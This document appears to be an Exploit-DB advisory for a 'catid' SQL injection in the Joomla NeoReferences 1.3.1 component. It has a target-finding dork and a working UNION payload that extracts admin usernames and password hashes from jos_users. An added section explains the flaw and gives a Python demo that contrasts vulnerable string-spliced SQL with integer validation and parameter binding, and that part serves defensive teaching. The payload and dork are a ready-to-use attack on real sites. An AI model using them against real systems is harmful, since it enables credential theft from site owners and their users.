Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection

EDB-ID: 5034
Author: S@BUN
Type: webapps
Platform: PHP
Date: 2008-02-01



#########################################################################
#
# joomla SQL Injection(com_neoreferences)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
EXPLOIT :

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*


#########################################################################
# S@BUN                           www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                              GOOD LUCKY                                S@BUN
#########################################################################
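The payload above is a UNION-based injection through the numeric catid parameter: the component evidently splices the raw request value into its SQL, so the attacker closes off the intended WHERE clause with a large, non-existent category id, appends a SELECT against jos_users (the default Joomla table prefix), and comments out the rest of the statement. The following is an added example, not code from NeoReferences or from the exploit author: a Python/SQLite model of the vulnerable query beside a hardened one, driven by the advisory's own payload. The table layout (neoreferences, jos_users), the column names, the sample rows and the concat() shim standing in for MySQL's function are all assumptions made for the demonstration; the component's real query is not shown on this page.

```python
"""Vulnerable vs. hardened handling of the 'catid' request parameter.

Added example, not code from the NeoReferences component. The table layout,
the column names and the rows below are constructed for the demonstration;
the component's real query is not known from the advisory.
"""
import re
import sqlite3
import urllib.parse

# The advisory's payload, URL-decoded the way PHP would present $_GET['catid'].
PAYLOAD = urllib.parse.unquote(
    "99887766/**/union/**/select/**/concat(username,0x3a,password)"
    "/**/from/**/jos_users/*%20where%20user_id=1=1/*"
)

# Constructed credential row: a fake hash:salt string, not real Joomla data.
FAKE_ADMIN_HASH = "0123456789abcdef0123456789abcdef:a1b2c3"


def _mysql_concat(*args):
    """Shim for MySQL concat(), which SQLite lacks.

    MySQL renders the hex literal 0x3a as the string ':'; SQLite hands it to
    us as the integer 58, so integers are mapped back to that byte. Good
    enough for this payload, not a general MySQL emulation.
    """
    return "".join(chr(a) if isinstance(a, int) else str(a) for a in args)


def build_demo_db():
    """In-memory stand-in for the Joomla database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("concat", -1, _mysql_concat)
    conn.executescript(
        """
        CREATE TABLE neoreferences (id INTEGER, catid INTEGER, title TEXT);
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO neoreferences VALUES (1, 27, 'Acme Corp website');
        INSERT INTO jos_users VALUES (62, 'admin', '%s');
        """ % FAKE_ADMIN_HASH
    )
    return conn


def list_references_vulnerable(conn, catid):
    """The advisory's bug: the raw request value is spliced into the SQL."""
    sql = "SELECT title FROM neoreferences WHERE catid = %s" % catid
    return [row[0] for row in conn.execute(sql)]


def list_references_hardened(conn, catid):
    """Validate catid as an integer and bind it as a query parameter.

    The PHP equivalent in a Joomla component is casting with (int)/intval()
    before the value reaches the query string; binding on top of that means
    the value can never be parsed as SQL at all.
    """
    if not re.fullmatch(r"\d{1,10}", str(catid)):
        raise ValueError("catid must be a positive integer")
    sql = "SELECT title FROM neoreferences WHERE catid = ?"
    return [row[0] for row in conn.execute(sql, (int(catid),))]


def hardened_rejects(conn, catid):
    """True if the hardened handler refuses the value."""
    try:
        list_references_hardened(conn, catid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable, catid=27     :", list_references_vulnerable(db, "27"))
    print("vulnerable, catid=PAYLOAD:", list_references_vulnerable(db, PAYLOAD))
    print("hardened,   catid=27     :", list_references_hardened(db, "27"))
    print("hardened,   catid=PAYLOAD:",
          "rejected" if hardened_rejects(db, PAYLOAD) else "accepted")
```

Running the script shows the vulnerable handler returning the admin row's username and password hash joined by ':' (the 0x3a in the payload) in place of a reference title, while the hardened handler serves the legitimate catid=27 request normally and refuses the payload before any SQL is built. The same check in the PHP component would be an integer cast on the parameter before it is used.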

added notes:
	<name>NeoReferences</name>
	<creationDate>December 2006</creationDate>
	<author>NeoJoomla</author>
	<license>Released under CREATIVE COMMONS License</license>
	<copyright>Copyright (C) 2006 Neoweb</copyright>

	<authorEmail>support@neojoomla.com</authorEmail>
	<authorUrl>www.neojoomla.com</authorUrl>
	<version>1.3.1</version>
	<description><![CDATA[NeoReferences is a component which enables you to manage your current and future references by category, thanks to a clear and very visual system of thumbnails!
You can add an image for each reference which will be resized by the component; just click on it to see the complete view.<br />Developed by NeoJoomla.]]></description>

# milw0rm.com [2008-02-01]